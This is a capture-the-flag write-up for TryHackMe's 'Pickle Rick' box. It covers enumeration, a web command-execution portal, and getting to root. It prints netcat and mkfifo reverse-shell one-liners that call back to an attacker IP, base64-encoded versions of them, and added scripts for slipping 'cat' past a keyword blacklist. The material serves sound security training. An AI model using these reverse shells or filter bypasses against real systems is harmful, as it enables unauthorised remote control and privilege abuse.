Pickle Rick is a TryHackMe CTF requiring you to exploit a web-server in order to find 3 ingredients.

[Task 1] Pickle Rick

What is the first ingredient Rick needs?

Browsing to the home page

Let's start out by browsing to the IP. We've already been told the box is a web server, so it's safe to assume there is a web site on it.

Browsing to the site you find an amusing Rick and Morty-based homepage telling you that you need to log in to the computer to retrieve 3 ingredients.

On further inspection of the page source, you'll find a comment near the closing </body> tag:

Note to self, remember username!
Username: R1ckRul3s

Running enumeration scripts

NMAP

Nothing particularly interesting here, for now. Just further confirmation that there is a web server (Apache 2.4.18 on port 80) and that SSH is open on port 22, which may come in useful later on.

kali@kali:~/Desktop/TryHackMe/picklerick$ nmap -sV -sC 10.10.3.141 -oA nmap.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:21 EDT                                                    
Nmap scan report for target.thm (10.10.3.141)                                                                      
Host is up (0.021s latency).                                                                                       
Not shown: 998 closed ports                                                                                        
PORT   STATE SERVICE VERSION                                                                                       
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)                                  
| ssh-hostkey:                                                                                                     
|   2048 35:9f:5b:ab:b1:49:3d:27:a1:b2:5e:e6:68:31:36:f0 (RSA)                                                     
|   256 46:c6:60:c2:f9:86:73:e9:b7:b9:d9:b3:0a:ed:9b:89 (ECDSA)                                                    
|_  256 a9:4c:47:2f:0f:fb:15:65:95:22:c2:85:f6:66:a9:2d (ED25519)                                                  
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))                                                                
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                       
|_http-title: Rick is sup4r cool                                                                                   
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

GOBUSTER

Hopefully gobuster can reveal more about the application.

kali@kali:~/Desktop/TryHackMe/picklerick$ gobuster dir --url http://target.thm --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://target.thm
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/13 09:24:29 Starting gobuster
===============================================================
/assets (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/13 09:25:31 Finished
===============================================================

The above gobuster run was pretty sparse, so I ran another, this time also enumerating files with the extensions htm, php, txt and a few others:

kali@kali:~/Desktop/TryHackMe/picklerick$ gobuster dir --url http://target.thm --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 100 --extensions htm,php,txt,rar,zip,db,cfg,js --expanded --followredirect
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://target.thm
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     htm,php,txt,rar,zip,db,cfg,js
[+] Follow Redir:   true
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/09/13 09:28:52 Starting gobuster
===============================================================
http://target.thm/login.php (Status: 200)
http://target.thm/assets (Status: 200)
http://target.thm/portal.php (Status: 200)
http://target.thm/robots.txt (Status: 200)

In this case, we found 3 files worth looking at:

  • login.php
  • portal.php
  • robots.txt

Digging into enumerated information

Login.php

This is a login page with a POST form that sends the following parameters:

  • username
  • password
  • sub=Login

Portal.php

This page redirects to login.php, likely because we're not logged in. If the details we've enumerated don't work, we may have to bruteforce the login form with hydra.

Robots.txt

A malformed robots file: instead of any directives, it contains a single line of text, Wubbalubbadubdub.
Could this be the password for the login page?

Attempting to login with enumerated data

We’ll be testing the following credentials that we’ve pulled so far:

  • Username: R1ckRul3s
  • Password: Wubbalubbadubdub (a guess, from robots.txt)

And fortunately, it works!

Exploiting Portal.php

Now that we’re in the Portal, we dig around.

Command execution form

The first thing we see on portal.php is the "command execution" input box. Let's test this to see what it actually runs; preferably it'll be server-side command execution through a shell or PHP.

Let's try running ls -lah and see if we can pull a directory listing.

And we can confirm the form executes shell commands on the server and returns the output:

total 40K
drwxr-xr-x 3 root   root   4.0K Feb 10  2019 .
drwxr-xr-x 3 root   root   4.0K Feb 10  2019 ..
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4.0K Feb 10  2019 assets
-rwxr-xr-x 1 ubuntu ubuntu   54 Feb 10  2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1.1K Feb 10  2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1.1K Feb 10  2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1.5K Feb 10  2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2.0K Feb 10  2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 robots.txt

After further attempted exploitation, I tried to run:

cat Sup3rS3cretPickl3Ingred.txt; echo; cat clue.txt; echo; whoami; echo; ps -aux; groups

Which returns Command disabled to make it hard for future PICKLEEEE RICCCKKKK. (¬.¬) ….

Fortunately the command input isn't disabled altogether: after a little fiddling around it turns out that it's specifically the cat command that's blocked. Interestingly, the source of the error page also contains a long string that, going by its character set and the = padding at the end, looks like base64 rather than a hash:

Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==
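Before moving on it's worth checking whether that string is simply base64 wrapped in base64 several times. The following is an added helper, not part of the original writeup, that peels layers until the output stops looking like base64. It strips and re-applies padding itself, so the doubled trailing == in the string as transcribed above won't trip the decoder. The sample it runs on is constructed here, not taken from the target; pass it the string from denied.php to try it on the box.

```shell
#!/bin/sh
# Added example (not from the original writeup): peel nested base64 until
# the result stops looking like base64. The sample below is constructed here.

# Print the fully decoded text; report how many layers were removed on stderr.
b64_peel() {
  cur=$1
  layers=0
  while :; do
    # base64 never contains anything but its alphabet, '=' padding and the
    # newlines some encoders insert every 76 columns
    compact=$(printf '%s' "$cur" | tr -d '\n\r')
    case "$compact" in
      '' | *[!A-Za-z0-9+/=]* ) break ;;
    esac
    # strip whatever padding is there and re-pad: a stray extra '=' (as in
    # the string transcribed above) would otherwise make the decoder fail
    body=$(printf '%s' "$compact" | sed 's/=*$//')
    case $(( ${#body} % 4 )) in
      1) break ;;                 # impossible length for base64
      2) body="${body}==" ;;
      3) body="${body}=" ;;
    esac
    next=$(printf '%s' "$body" | base64 -d 2>/dev/null) || break
    [ -n "$next" ] || break
    # stop before replacing readable text with binary junk from over-decoding
    [ -z "$(printf '%s' "$next" | tr -d '[:print:][:space:]')" ] || break
    cur=$next
    layers=$((layers + 1))
  done
  echo "peeled $layers layer(s)" >&2
  printf '%s\n' "$cur"
}

# Constructed sample: plaintext wrapped three times. The plaintext contains
# spaces, which is what tells the loop it has reached the bottom.
PLAINTEXT='constructed sample: not from the target'
SAMPLE=$(printf '%s' "$PLAINTEXT" | base64 | base64 | base64 | tr -d '\n')
b64_peel "$SAMPLE"
b64_peel "${SAMPLE}="     # tolerates an extra trailing '=' as well
```

The printable-text check matters: a short plaintext made only of letters and digits would otherwise be "decoded" one time too many into garbage.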

The whoami command tells us we're running as www-data.

The ls /home command shows there are two users with home directories: rick and ubuntu.

Trying to get a reverse netcat shell

I tried to figure out what the string above was, but to no avail, so let's see if we can get a reverse shell on the machine and a more interactive interface to toy around with.

We’ll need to listen for connections on our attacker machine.

# On the attacker machine
nc -lvp 4444
# On the victim machine, run netcat, and on connect, create a shell
nc 10.11.8.219 4444 -e /bin/sh

The connection failed, which could be down to the version of netcat, so I ran man netcat via the portal input. It returned a hint on how to work around this:

There is no -c or -e option in this netcat, but you still can execute a
     command after connection being established by redirecting file descrip-
     tors. Be cautious here because opening a port and let anyone connected
     execute arbitrary command on your site is DANGEROUS. If you really need
     to do this, here is an example:

     On 'server' side:

           $ rm -f /tmp/f; mkfifo /tmp/f
           $ cat /tmp/f | /bin/sh -i 2>&1 | nc 10.11.8.219 4444 > /tmp/f

We can't use the cat command from the portal, but it's worth checking whether the rest of that line runs on the victim box at all, so let's test it at least.

# Run first, to create the mkfifo
rm -f /tmp/f; mkfifo /tmp/f;
# Run second, for reverse shell
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.11.8.219 4444 > /tmp/f;

Unfortunately we failed once again. At this point the options are to:

a. Create a shell script shell.sh, echo the "Run second" part from above into it, then run that.
b. Create a PHP-based shell, upload it to /var/www/html and execute it by browsing to it.

I’ll go with option A first, then test B.

Shell attempt #1 (shell script)

To save time, I can first determine whether it's actually the word cat that's causing the remote execution to fail:

echo 'cat'; if even this fails, the filter is matching the word anywhere in the submitted string and we can skip to option B.

And, fortunately in a way, it does fail: the filter rejects any command string that contains cat, regardless of what's around it. So it looks like we should try another route.
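To see why that test matters, here is an added example that is not from the original writeup: a stand-in for the portal's blacklist (written as a shell function, since the real PHP was never visible) and several ways a one-liner gets past a plain substring match, because the shell removes the quotes, backslash or glob before cat is ever executed. The file it reads is a constructed temp file, not the ingredient file on the box.

```shell
#!/bin/sh
# Added example (not from the original writeup). portal_filter is a stand-in
# that reproduces the behaviour observed above: any submitted string containing
# the literal "cat" is refused, everything else is handed to a shell.

portal_filter() {
  case "$1" in
    *cat*) echo 'Command disabled to make it hard for future PICKLEEEE RICCCKKKK.'; return 1 ;;
  esac
  sh -c "$1"
}

# Constructed stand-in for Sup3rS3cretPickl3Ingred.txt (not the real file).
SECRET=$(mktemp)
printf 'constructed-ingredient\n' > "$SECRET"
trap 'rm -f "$SECRET"' EXIT

# Each of these reaches /bin/cat without the letters c-a-t appearing next to
# each other in the submitted string, so a substring blacklist never sees it.
bypass_quotes() { portal_filter "c\"\"at $1"; }               # submits: c""at FILE
bypass_escape() { portal_filter "c\\at $1"; }                 # submits: c\at FILE
bypass_glob()   { portal_filter "/bin/c[a]t $1"; }            # submits: /bin/c[a]t FILE
bypass_subst()  { portal_filter "\$(printf 'c%st' a) $1"; }   # submits: $(printf 'c%st' a) FILE
bypass_other()  { portal_filter "sed -n p $1"; }              # or just use a different reader

echo "blocked:"; portal_filter "cat $SECRET" || true
echo "quotes:";  bypass_quotes "$SECRET"
echo "escape:";  bypass_escape "$SECRET"
echo "glob:";    bypass_glob "$SECRET"
echo "subst:";   bypass_subst "$SECRET"
echo "other:";   bypass_other "$SECRET"
```

The glob form assumes /bin/cat exists at that path; the others work wherever a POSIX shell does. The lesson for anyone writing such a filter is the one the writeup runs into: a blacklist on the raw command string is not a security boundary.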

Shell attempt #2 (php script)

First we need to determine whether we can wget files. If we can, we'll set up python3 -m http.server on our attacker machine, create a PHP shell, fetch it into /var/www/html/... and then execute it by browsing to the file.

But, unfortunately, wget doesn’t seem to return any response.

Shell attempt #3 (shell script hacky)

We can't run the cat command, but we might be able to echo 'ca' and then 't ...' into a script file that we then execute. That way we avoid putting an explicit cat into the command we submit.

We don’t have write access in /var/www/html.

On running sudo -l, our current user turns out to have some very generous permissions: www-data may run any command as root without a password. I'm unsure how best to exploit this for the time being, but let's dive deeper and find out where we can write a shell to.

Matching Defaults entries for www-data on ip-10-10-3-141.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-3-141.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

It really feels like we should have write access in /var/www/html, but let's try somewhere else. The classic /tmp directory is usually world-writable.

touch /tmp/x.sh; ls -lah /tmp;
x.sh

Success, we can create a shell script here. Now let's try our hacky cat concatenation.

# first we'll print 'ca' to the file, then the rest
printf 'ca' > /tmp/x.sh;
ls -lah /tmp/x.sh | grep x.sh; # we can see that bytes are added to the file! 
# and the rest...
printf 't /tmp/f | /bin/sh -i 2>&1 | nc -l 10.11.8.219 4444 > /tmp/f;' >> /tmp/x.sh;
ls -lah /tmp/x.sh | grep x.sh; # fingers crossed this'll run! 
# then try run the script with sudo
sudo sh /tmp/x.sh;
# if that fails try normal shell exec
sh /tmp/x.sh;

This unfortunately failed; but let's test whether the shell script actually runs at all, as it may be an error on our behalf. (In hindsight it was: the -l in the nc line of x.sh tells netcat to listen rather than connect out, so the shell never calls back to our listener.)

touch /tmp/y.sh;
printf 'touch /tmp/works.txt; whoami | printf > /tmp/works.txt;' > /tmp/y.sh;
sudo sh /tmp/y.sh;
ls -lah /tmp/;

The script is running as root (works.txt is owned by root), so we're really close. See the works.txt file:

total 40K
drwxrwxrwt  8 root     root     4.0K Sep 13 14:33 .
drwxr-xr-x 23 root     root     4.0K Sep 13 12:50 ..
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .ICE-unix
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .Test-unix
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .X11-unix
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .XIM-unix
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .font-unix
prw-r--r--  1 www-data www-data    0 Sep 13 14:04 f
drwx------  3 root     root     4.0K Sep 13 12:50 systemd-private-a938bdfc8fce449a9ca1d228a57f00d8-systemd-timesyncd.service-oSRCc2
-rw-r--r--  1 root     root        0 Sep 13 14:33 works.txt
-rw-r--r--  1 www-data www-data   63 Sep 13 14:30 x.sh
-rw-r--r--  1 www-data www-data   55 Sep 13 14:33 y.sh

The file has no bytes in it, but that isn't printf failing as such: printf doesn't read standard input, so piping whoami into it writes nothing (whoami > /tmp/works.txt on its own would have captured the name). echo ignores its standard input in the same way, so swapping it in gives the same result:

touch /tmp/y.sh;
echo 'touch /tmp/works2.txt; whoami | echo > /tmp/works2.txt;' > /tmp/y.sh;
sudo sh /tmp/y.sh;
ls -lah /tmp/;

Either way, the owner of works.txt shows we DO have root. Let's see if we can steal some SSH files from either rick or ubuntu.

Stealing SSH files instead..

We know we can perform root actions, we just can't use cat or head, etc. A little bit annoying, but we do have more options. Let's see if there are any SSH keys we can acquire.

sudo ls -lah /home/rick

And heh, we’ve found the second ingredient file at least…

Though, there aren't any SSH files for rick.

sudo ls -lah /home/ubuntu/.ssh turns up nothing either, annoyingly.

Let's get dirty and create an encoded script

I'm going to base64-encode the previous script on the attacker machine, then decode the text back into a shell script on the victim. That way the word cat never appears in anything we submit to the portal.

# on attacker machine

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f' | base64;

We get the following output, which isn't quite right: GNU base64 wraps its output at 76 columns, so the blob comes back split over two lines (base64 -w0 would avoid that).

# base64 script for victim...
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAu
MTEuOC4yMTkgNDQ0NCA+L3RtcC9mCg==

Let's chunk it down instead so we don't have a funky line break:

echo 'rm /tmp/f;mkfifo /tmp/f;' | base64;
echo 'cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f;' | base64;

kali@kali:~/Desktop/TryHackMe/picklerick$ echo 'rm /tmp/f;mkfifo /tmp/f;' | base64;
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Cg==

kali@kali:~/Desktop/TryHackMe/picklerick$ echo 'cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f;' | base64;
Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTEuOC4yMTkgNDQ0NCA+L3RtcC9mOwo=

And run this on the victim machine:

touch /tmp/a.sh;

echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Cg==' | base64 -d > /tmp/a.sh;
echo 'Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTEuOC4yMTkgNDQ0NCA+L3RtcC9mOwo=' | base64 -d >> /tmp/a.sh;

sudo sh /tmp/a.sh;

We then get a root shell back on our netcat listener:

kali@kali:~/Desktop/TryHackMe/picklerick$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.11.8.219] from target.thm [10.10.70.157] 42390
/bin/sh: 0: can't access tty; job control turned off                                                                                                        
# whoami                                                                                                           
root                                                                                                               

Now to explore and, finally, cat the files we were looking for.

Exploiting root shell

We can now read the first ingredient that Rick needs:

# cat Sup3rS3cretPickl3Ingred.txt

Whats the second ingredient Rick needs?

We stumbled on this earlier, it’s tucked away in the /home/rick directory.

# cd /home/rick
# ls
second ingredients
# cat 'second ingredients'

Whats the final ingredient Rick needs?

There's nothing else in the /home/rick directory, so let's explore further.

The /home/ubuntu directory seems empty at first, but on running ls -lah we find a .bash_history file, which contains a reference to the last ingredient.

cat /home/ubuntu/.bash_history

That was a good box.
